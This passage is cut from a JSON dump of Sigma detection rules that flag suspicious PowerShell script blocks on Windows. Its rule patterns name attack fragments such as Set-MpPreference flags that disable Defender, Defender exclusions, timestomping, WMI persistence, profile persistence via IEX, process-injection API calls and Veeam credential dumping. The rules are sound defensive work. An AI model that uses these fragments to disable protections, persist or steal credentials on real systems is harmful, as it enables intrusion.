    "content": "title: PowerShell Write-EventLog Usage\nid: 35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e\nstatus: test\ndescription: Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use\nreferences:\n    - https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-16\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Write-EventLog'\n            - '-RawData '\n    condition: selection\nfalsepositives:\n    - Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml",
    "content": "title: Zip A Folder With PowerShell For Staging In Temp - PowerShell Script\nid: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 # PowerShell Script\nrelated:\n    - id: 71ff406e-b633-4989-96ec-bc49d825a412 # PowerShell Classic\n      type: similar\n    - id: daf7eb81-35fd-410d-9d7a-657837e602bb # PowerShell Module\n      type: similar\n    - id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation\n      type: similar\nstatus: test\ndescription: |\n    Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\n    An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2021-07-20\nmodified: 2023-12-18\ntags:\n    - attack.collection\n    - attack.t1074.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Compress-Archive -Path*-DestinationPath $env:TEMP'\n            - 'Compress-Archive -Path*-DestinationPath*\\AppData\\Local\\Temp\\'\n            - 'Compress-Archive -Path*-DestinationPath*:\\Windows\\Temp\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml",
    "content": "title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction\nid: dddfebae-c46f-439c-af7a-fdb6bde90218\nrelated:\n    - id: fde7929d-8beb-4a4c-b922-be9974671667\n      type: derived\n    - id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299\n      type: derived\nstatus: test\ndescription: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/\nauthor: 'Ensar Şamil, @sblmsrsn, OSCD Community'\ndate: 2020-10-05\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'SyncAppvPublishingServer.exe'\n    condition: selection\nfalsepositives:\n    - App-V clients\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_rem_mp.yml",
    "content": "title: Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging\nid: ae2bdd58-0681-48ac-be7f-58ab4e593458\nrelated:\n    - id: 07e3cb2c-0608-410d-be4b-1511cb1a0448\n      type: similar\nstatus: test\ndescription: Detects attempts to remove Windows Defender configuration using the 'MpPreference' cmdlet\nreferences:\n    - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-05\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_remove:\n        ScriptBlockText|contains: 'Remove-MpPreference'\n    selection_tamper:\n        ScriptBlockText|contains:\n            - '-ControlledFolderAccessProtectedFolders '\n            - '-AttackSurfaceReductionRules_Ids '\n            - '-AttackSurfaceReductionRules_Actions '\n            - '-CheckForSignaturesBeforeRunningScan '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml",
    "content": "title: Tamper Windows Defender - ScriptBlockLogging\nid: 14c71865-6cd3-44ae-adaa-1db923fae5f2\nrelated:\n    - id: ec19ebab-72dc-40e1-9728-4c0b805d722c\n      type: derived\nstatus: test\ndescription: Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps\n    - https://bidouillesecurity.com/disable-windows-defender-in-powershell/\nauthor: frack113, elhoim, Tim Shelton (fps, alias support), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-16\nmodified: 2024-01-02\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_options_disabling_preference:\n        ScriptBlockText|contains: 'Set-MpPreference'\n    selection_options_disabling_function:\n        ScriptBlockText|contains:\n            - '-dbaf $true'\n            - '-dbaf 1'\n            - '-dbm $true'\n            - '-dbm 1'\n            - '-dips $true'\n            - '-dips 1'\n            - '-DisableArchiveScanning $true'\n            - '-DisableArchiveScanning 1'\n            - '-DisableBehaviorMonitoring $true'\n            - '-DisableBehaviorMonitoring 1'\n            - '-DisableBlockAtFirstSeen $true'\n            - '-DisableBlockAtFirstSeen 1'\n            - '-DisableCatchupFullScan $true'\n            - '-DisableCatchupFullScan 1'\n            - '-DisableCatchupQuickScan $true'\n            - '-DisableCatchupQuickScan 1'\n            - '-DisableIntrusionPreventionSystem $true'\n            - '-DisableIntrusionPreventionSystem 1'\n            - '-DisableIOAVProtection $true'\n            - '-DisableIOAVProtection 1'\n            - '-DisableRealtimeMonitoring $true'\n            - '-DisableRealtimeMonitoring 1'\n            - '-DisableRemovableDriveScanning $true'\n            - '-DisableRemovableDriveScanning 1'\n            - '-DisableScanningMappedNetworkDrivesForFullScan $true'\n            - '-DisableScanningMappedNetworkDrivesForFullScan 1'\n            - '-DisableScanningNetworkFiles $true'\n            - '-DisableScanningNetworkFiles 1'\n            - '-DisableScriptScanning $true'\n            - '-DisableScriptScanning 1'\n            - '-MAPSReporting $false'\n            - '-MAPSReporting 0'\n            - '-drdsc $true'\n            - '-drdsc 1'\n            - '-drtm $true'\n            - '-drtm 1'\n            - '-dscrptsc $true'\n            - '-dscrptsc 1'\n            - '-dsmndf $true'\n            - '-dsmndf 1'\n            - '-dsnf $true'\n            - '-dsnf 1'\n            - '-dss $true'\n            - '-dss 1'\n    selection_other_default_actions_allow:\n        ScriptBlockText|contains: 'Set-MpPreference'\n    selection_other_default_actions_func:\n        ScriptBlockText|contains:\n            - 'HighThreatDefaultAction Allow'\n            - 'htdefac Allow'\n            - 'LowThreatDefaultAction Allow'\n            - 'ltdefac Allow'\n            - 'ModerateThreatDefaultAction Allow'\n            - 'mtdefac Allow'\n            - 'SevereThreatDefaultAction Allow'\n            - 'stdefac Allow'\n    condition: all of selection_options_disabling_* or all of selection_other_default_actions_*\nfalsepositives:\n    - Legitimate PowerShell scripts that disable Windows Defender for troubleshooting purposes. Must be investigated.\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml",
    "content": "title: Testing Usage of Uncommonly Used Port\nid: adf876b3-f1f8-4aa9-a4e4-a64106feec06\nstatus: test\ndescription: |\n    Adversaries may communicate using a protocol and port paring that are typically not associated.\n    For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell\n    - https://learn.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps\nauthor: frack113\ndate: 2022-01-23\ntags:\n    - attack.command-and-control\n    - attack.t1571\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - Test-NetConnection\n            - '-ComputerName '\n            - '-port '\n    filter:\n        ScriptBlockText|contains:\n            - ' 443 '\n            - ' 80 '\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_timestomp.yml",
    "content": "title: Powershell Timestomp\nid: c6438007-e081-42ce-9483-b067fbef33c3\nstatus: test\ndescription: |\n    Adversaries may modify file time attributes to hide new or changes to existing files.\n    Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md\n    - https://www.offensive-security.com/metasploit-unleashed/timestomp/\nauthor: frack113\ndate: 2021-08-03\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1070.006\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_ioc:\n        ScriptBlockText|contains:\n            - '.CreationTime ='\n            - '.LastWriteTime ='\n            - '.LastAccessTime ='\n            - '[IO.File]::SetCreationTime'\n            - '[IO.File]::SetLastAccessTime'\n            - '[IO.File]::SetLastWriteTime'\n    condition: selection_ioc\nfalsepositives:\n    - Legitimate admin script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml",
    "content": "title: User Discovery And Export Via Get-ADUser Cmdlet - PowerShell\nid: c2993223-6da8-4b1a-88ee-668b8bf315e9\nrelated:\n    - id: 1114e048-b69c-4f41-bc20-657245ae6e3f\n      type: similar\nstatus: test\ndescription: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file\nreferences:\n    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\n    - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-17\ntags:\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Get-ADUser '\n            - ' -Filter \\*'\n        ScriptBlockText|contains:\n            - ' > '\n            - ' | Select '\n            - 'Out-File'\n            - 'Set-Content'\n            - 'Add-Content'\n    condition: selection\nfalsepositives:\n    - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_user_profile_tampering.yml",
    "content": "title: Potential Persistence Via PowerShell User Profile Using Add-Content\nid: 05b3e303-faf0-4f4a-9b30-46cc13e69152\nstatus: test\ndescription: Detects calls to \"Add-Content\" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-08-18\nmodified: 2023-05-04\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.013\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_add:\n        ScriptBlockText|contains: 'Add-Content $profile'\n    selection_options:\n        ScriptBlockText|contains:\n            # Note: You can add more suspicious values\n            - '-Value \"IEX '\n            - '-Value \"Invoke-Expression'\n            - '-Value \"Invoke-WebRequest'\n            - '-Value \"Start-Process'\n            - \"-Value 'IEX \"\n            - \"-Value 'Invoke-Expression\"\n            - \"-Value 'Invoke-WebRequest\"\n            - \"-Value 'Start-Process\"\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration and tuning scripts that aim to add functionality to a user PowerShell session\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml",
    "content": "title: Abuse of Service Permissions to Hide Services Via Set-Service - PS\nid: 953945c5-22fe-4a92-9f8a-a9edc1e522da\nrelated:\n    - id: 514e4c3a-c77d-4cde-a00f-046425e2301e\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)\nreferences:\n    - https://twitter.com/Alh4zr3d/status/1580925761996828672\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.011\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Set-Service '\n            - 'DCLCWPDTSD'\n        ScriptBlockText|contains:\n            - '-SecurityDescriptorSddl '\n            - '-sd '\n    condition: selection\nfalsepositives:\n    - Rare intended use of hidden services\n    - Rare FP could occur due to the non linearity of the ScriptBlockText log\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_vbscript_registry_modification.yml",
    "content": "title: Registry Modification Attempt Via VBScript - PowerShell\nid: 2a0a169d-cc66-43ce-9ae2-6e678e54e46a\nrelated:\n    - id: 921aa10f-2e74-4cca-9498-98f9ca4d6fdf\n      type: similar\n    - id: 7f4c43f9-b1a5-4c7d-b24a-b41bf3a3ebf2\n      type: similar\nstatus: experimental\ndescription: |\n    Detects attempts to modify the registry using VBScript's CreateObject(\"Wscript.shell\") and RegWrite methods embedded within PowerShell scripts or commands.\n    Threat actors commonly embed VBScript code within PowerShell to perform registry modifications, attempting to evade detection that monitors for direct registry access through traditional tools.\n    This technique can be used for persistence, defense evasion, and privilege escalation by modifying registry keys without using regedit.exe, reg.exe, or PowerShell's native registry cmdlets.\nreferences:\n    - https://www.linkedin.com/posts/mauricefielenbach_livingofftheland-redteam-persistence-activity-7344801774182051843-TE00/\n    - https://www.nextron-systems.com/2025/07/29/detecting-the-most-popular-mitre-persistence-method-registry-run-keys-startup-folder/\n    - https://detect.fyi/hunting-fileless-malware-in-the-windows-registry-1339ccde00ad\ndate: 2025-08-13\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.execution\n    - attack.t1112\n    - attack.t1059.005\nlogsource:\n    category: ps_script\n    product: windows\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'CreateObject'\n            - 'Wscript.shell'\n            - '.RegWrite'\n    condition: selection\nfalsepositives:\n    - Some legitimate admin or install scripts may use these processes for registry modifications.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml",
    "content": "title: Veeam Backup Servers Credential Dumping Script Execution\nid: 976d6e6f-a04b-4900-9713-0134a353e38b\nstatus: test\ndescription: Detects execution of a PowerShell script that contains calls to the \"Veeam.Backup\" class, in order to dump stored credentials.\nreferences:\n    - https://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.credential-access\nlogsource:\n    product: windows\n    category: ps_script\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - '[Credentials]'\n            - '[Veeam.Backup.Common.ProtectedStorage]::GetLocalString'\n            - 'Invoke-Sqlcmd'\n            - 'Veeam Backup and Replication'\n    condition: selection\nfalsepositives:\n    - Administrators backup scripts (must be investigated)\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml",
    "content": "title: Usage Of Web Request Commands And Cmdlets - ScriptBlock\nid: 1139d2e2-84b1-4226-b445-354492eba8ba\nrelated:\n    - id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d\n      type: derived\nstatus: test\ndescription: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs\nreferences:\n    - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/\n    - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell\nauthor: James Pemberton / @4A616D6573\ndate: 2019-10-24\nmodified: 2025-10-20\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - '[System.Net.WebRequest]::create'\n            - 'curl '\n            - 'Invoke-RestMethod'\n            - 'Invoke-WebRequest'\n            - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring\n            - 'iwr '\n            # - 'Net.WebClient' # There are various other rules that cover this, so it is commented out\n            - 'Resume-BitsTransfer'\n            - 'Start-BitsTransfer'\n            - 'wget '\n            - 'WinHttp.WinHttpRequest'\n    filter:\n        Path|startswith: 'C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\'\n    condition: selection and not filter\nfalsepositives:\n    - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_win32_nteventlogfile_usage.yml",
    "content": "title: Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript\nid: e2812b49-bae0-4b21-b366-7c142eafcde2\nstatus: test\ndescription: Detects usage of the WMI class \"Win32_NTEventlogFile\" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-13\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: ps_script\n    product: windows\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection_class:\n        ScriptBlockText|contains: 'Win32_NTEventlogFile'\n    selection_function:\n        ScriptBlockText|contains:\n            - '.BackupEventlog('\n            - '.ChangeSecurityPermissions('\n            - '.ChangeSecurityPermissionsEx('\n            - '.ClearEventLog('\n            - '.Delete('\n            - '.DeleteEx('\n            - '.Rename('\n            - '.TakeOwnerShip('\n            - '.TakeOwnerShipEx('\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration and backup scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml",
    "content": "title: PowerShell WMI Win32_Product Install MSI\nid: 91109523-17f0-4248-a800-f81d9e7c081d\nstatus: test\ndescription: Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md\nauthor: frack113\ndate: 2022-04-24\ntags:\n    - attack.defense-evasion\n    - attack.t1218.007\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Invoke-CimMethod '\n            - '-ClassName '\n            - 'Win32_Product '\n            - '-MethodName '\n            - '.msi'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_win_api_susp_access.yml",
    "content": "title: Potential WinAPI Calls Via PowerShell Scripts\nid: 03d83090-8cba-44a0-b02f-0b756a050306\nrelated:\n    - id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702\n      type: similar\nstatus: test\ndescription: Detects use of WinAPI functions in PowerShell scripts\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: Nasreddine Bencherchali (Nextron Systems), Nikita Nazarov, oscd.community\ndate: 2020-10-06\nmodified: 2023-06-20\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1106\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    # Note: Add more suspicious combinations in the form of different selections\n    selection_injection:\n        ScriptBlockText|contains|all:\n            - 'VirtualAlloc'\n            - 'OpenProcess'\n            - 'WriteProcessMemory'\n            - 'CreateRemoteThread'\n    selection_token_steal:\n        ScriptBlockText|contains|all:\n            - 'OpenProcessToken'\n            - 'LookupPrivilegeValue'\n            - 'AdjustTokenPrivileges'\n    selection_duplicate_token:\n        ScriptBlockText|contains|all:\n            - 'OpenProcessToken'\n            - 'DuplicateTokenEx'\n            - 'CloseHandle'\n    selection_process_write_read:\n        ScriptBlockText|contains|all:\n            - 'WriteProcessMemory'\n            - 'VirtualAlloc'\n            - 'ReadProcessMemory'\n            - 'VirtualFree'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml",
    "content": "title: Windows Defender Exclusions Added - PowerShell\nid: c1344fa2-323b-4d2e-9176-84b4d4821c88\nrelated:\n    - id: 17769c90-230e-488b-a463-e05c08e9d48f\n      type: similar\nstatus: test\ndescription: Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions\nreferences:\n    - https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-16\nmodified: 2022-11-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: ps_script\n    product: windows\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_args_exc:\n        ScriptBlockText|contains:\n            - ' -ExclusionPath '\n            - ' -ExclusionExtension '\n            - ' -ExclusionProcess '\n            - ' -ExclusionIpAddress '\n    selection_args_pref:\n        ScriptBlockText|contains:\n            - 'Add-MpPreference '\n            - 'Set-MpPreference '\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml",
    "content": "title: Windows Firewall Profile Disabled\nid: 488b44e7-3781-4a71-888d-c95abfacf44d\nrelated:\n    - id: 12f6b752-042d-483e-bf9c-915a6d06ad75\n      type: similar\nstatus: test\ndescription: Detects when a user disables the Windows Firewall via a Profile to help evade defense.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2022-ps\n    - https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell\n    - https://web.archive.org/web/20230929023836/http://powershellhelp.space/commands/set-netfirewallrule-psv5.php\n    - http://woshub.com/manage-windows-firewall-powershell/\n    - https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html\nauthor: Austin Songer @austinsonger\ndate: 2021-10-12\nmodified: 2022-12-30\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_args:\n        ScriptBlockText|contains|all:\n            - 'Set-NetFirewallProfile '\n            - ' -Enabled '\n            - ' False'\n    selection_opt:\n        ScriptBlockText|contains:\n            - ' -All '\n            - 'Public'\n            - 'Domain'\n            - 'Private'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml",
    "content": "title: Winlogon Helper DLL\nid: 851c506b-6b7c-4ce2-8802-c703009d03c0\nstatus: test\ndescription: |\n    Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n    Registry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\n    used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\n    load and execute malicious DLLs and/or executables.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md\nauthor: Timur Zinniatullin, oscd.community\ndate: 2019-10-21\nmodified: 2022-07-07\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.004\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'CurrentVersion\\Winlogon'\n    selection2:\n        ScriptBlockText|contains:\n            - 'Set-ItemProperty'\n            - 'New-Item'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml",
    "content": "title: Powershell WMI Persistence\nid: 9e07f6e7-83aa-45c6-998e-0af26efd0a85\nstatus: test\ndescription: Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md\n    - https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545\nauthor: frack113\ndate: 2021-08-19\nmodified: 2022-12-25\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_ioc:\n        - ScriptBlockText|contains|all:\n              - 'New-CimInstance '\n              - '-Namespace root/subscription '\n              - '-ClassName __EventFilter '\n              - '-Property ' # is a variable name\n        - ScriptBlockText|contains|all:\n              - 'New-CimInstance '\n              - '-Namespace root/subscription '\n              - '-ClassName CommandLineEventConsumer '\n              - '-Property ' # is a variable name\n    condition: selection_ioc\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml",
    "content": "title: WMIC Unquoted Services Path Lookup - PowerShell\nid: 09658312-bc27-4a3b-91c5-e49ab9046d1b\nrelated:\n    - id: 68bcd73b-37ef-49cb-95fc-edc809730be6\n      type: similar\nstatus: test\ndescription: Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts\nreferences:\n    - https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py\n    - https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1\n    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-20\nmodified: 2022-11-25\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Get-WmiObject '\n            - 'gwmi '\n        ScriptBlockText|contains|all:\n            - ' Win32_Service '\n            - 'Name'\n            - 'DisplayName'\n            - 'PathName'\n            - 'StartMode'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_wmimplant.yml",
